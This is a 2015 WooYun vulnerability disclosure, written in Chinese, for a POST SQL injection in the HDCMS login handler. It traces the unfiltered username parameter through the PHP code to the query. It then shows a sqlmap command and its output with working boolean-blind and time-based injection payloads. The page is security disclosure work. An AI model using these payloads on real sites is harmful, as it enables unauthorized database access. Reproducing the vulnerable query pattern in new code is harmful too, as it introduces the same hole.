当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093205

漏洞标题:HDCMS内容管理系统#POST注入

相关厂商:HDCMS

漏洞作者: m-33

提交时间:2015-01-27 15:14

修复时间:2015-04-27 15:16

公开时间:2015-04-27 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

HDCMS内容管理系统V141221存在POST注入

详细说明:

漏洞在登录处,看下登录方法
LoginController.class.php

//会员登录
    public function login()
    {
        if (IS_POST) {
            if ($this->db->userLogin()) {
                if (cookie('HISTORY'))
                    go(cookie('HISTORY'));
                else
                    go(U('Member/Index/index'));
            } else {
                $this->error($this->db->error);
            }
        } else {
            $this->display();
        }
    }


跟踪userLogin到LoginModel.class.php

//会员登录
    public function userLogin()
    {
        if (!$username = Q('post.username')) {
            $this->error = '帐号不能为空';
            return false;
        }
        if (!$password = Q('post.password')) {
            $this->error = '密码不能为空';
            return false;
        }
        if (!$user = M("user")->join("__user__ u JOIN __role__ r ON u.rid=r.rid")->find("username='{$username}'")) {
            $this->error = '帐号不存在';
            return false;
        }
        if (md5($password . $user['code']) != $user['password']) {
            $this->error = '密码错误';
            return false;
        }
        /**
         * 修改登录IP
         */
        $data['uid']=$user['uid'];
        $data['lastip']=ip_get_client();
        M('user')->save($data);
        unset($user['password']);
        unset($user['code']);
        //头像
        if (empty($user['icon']) || !is_file($user['icon'])) {
            $user['icon'] = __STATIC__ . '/image/user.png';
        } else {
            $user['icon'] = __ROOT__ . '/' . $user['icon'];
        }
        $user['web_master'] = strtolower($user['username']) == strtolower(C('WEB_MASTER'));;
        $_SESSION['user'] = $user;
        return true;
    }
}


重要的是这句

if (!$user = M("user")->join("__user__ u JOIN __role__ r ON u.rid=r.rid")->find("username='{$username}'")) {
            $this->error = '帐号不存在';
            return false;


$username无过滤,Function.php

function Q($var, $default = null, $filter = null)
{
    //拆分,支持get.id  或 id
    $var = explode(".", $var);
    if (count($var) == 1) {
        array_unshift($var, 'request');
    }
    $var[0] = strtolower($var[0]);
    //获得数据并执行相应的安全处理
    switch (strtolower($var[0])) {
        case 'get' :
            $data = &$_GET;
            break;
        case 'post' :
            $data = &$_POST;
            break;
        case 'request' :
            $data = &$_REQUEST;
            break;
        case 'files' :
            $data = &$_FILES;
            break;
        case 'session' :
            $data = &$_SESSION;
            break;
        case 'cookie' :
            $data = &$_COOKIE;
            break;
        case 'server' :
            $data = &$_SERVER;
            break;
        case 'globals' :
            $data = &$GLOBALS;
            break;
        default :
            throw_exception($var[0] . 'Q方法参数错误');
    }
    //没有执行参数如q("post.")时返回所有数据
    if (empty($var[1])) {
        return $data;
        //如果存在数据如$this->_get("page"),$_GET中存在page数据
    } else if (isset($data[$var[1]])) {
        //要获得参数如$this->_get("page")中的page
        $value = $data[$var[1]];
        //对参数进行过滤的函数
        $funcArr = is_null($filter) ? C("FILTER_FUNCTION") : $filter;
        //参数过滤函数
        if (is_string($funcArr) && !empty($funcArr)) {
            $funcArr = explode(",", $funcArr);
        }
        //是否存在过滤函数
        if (!empty($funcArr) && is_array($funcArr)) {
            //对数据进行过滤处理
            foreach ($funcArr as $func) {
                if (!function_exists($func))
                    continue;
                $value = is_array($value) ? array_map($func, $value) : $func($value);
            }
            $data[$var[1]] = $value;
            return $value;
        }
        return $value;
    } else {
        $data[$var[1]] = $default;
        return $default;
    }
}


跟踪find方法,Model.class.php

public function select($where = '')
    {
        $this->trigger && method_exists($this, '__before_select')
        && $this->__before_select();
        $return = $this->db->select($where);
        $this->trigger && method_exists($this, '__after_select')
        && $this->__after_select($return);
        /**
         * 重置模型
         */
        $this->__reset();
        return $return;
    }


$db调用Db.class.php中的select方法

public function select($where = '')
    {
        /**
         * 有查询条件时
         */
        $this->where($where);
        /**
         * 组合查询SQL
         */
        $sql = 'SELECT ' . $this->opt['field'] . ' FROM ' . $this->opt['table'] .
            $this->opt['where'] . $this->opt['group'] . $this->opt['having'] .
            $this->opt['order'] . $this->opt['limit'];
        return $this->query($sql);
    }


漏洞证明:

跑下数据

sqlmap.py -u"http://127.0.0.1/hdcms/index.php?m=Member&c=Login&a=login" --data "username=tsplay&password=tsplay" -p username --batch  --dbs


结果

POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] N
sqlmap identified the following injection points with a total of 207 HTTP(s) req
uests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=tsplay' AND 8396=8396 AND 'IYjy'='IYjy&password=tsplay
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=tsplay' AND SLEEP(5) AND 'STUA'='STUA&password=tsplay
---
[18:24:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

修复方案:

版权声明:转载请注明来源 m-33@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝